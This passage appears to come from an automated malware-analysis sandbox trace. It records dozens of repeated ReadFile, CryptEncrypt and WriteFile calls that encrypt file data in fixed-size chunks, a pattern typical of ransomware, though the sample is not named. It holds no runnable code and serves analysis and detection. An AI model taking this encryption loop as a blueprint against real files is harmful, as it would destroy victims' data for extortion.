hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.815] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.815] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.819] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.819] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.819] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.819] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.820] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.820] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.820] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.820] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.820] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.821] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.821] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.821] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.821] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.821] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.821] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.822] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.822] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.822] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.822] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.822] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.823] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.824] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.824] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.825] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 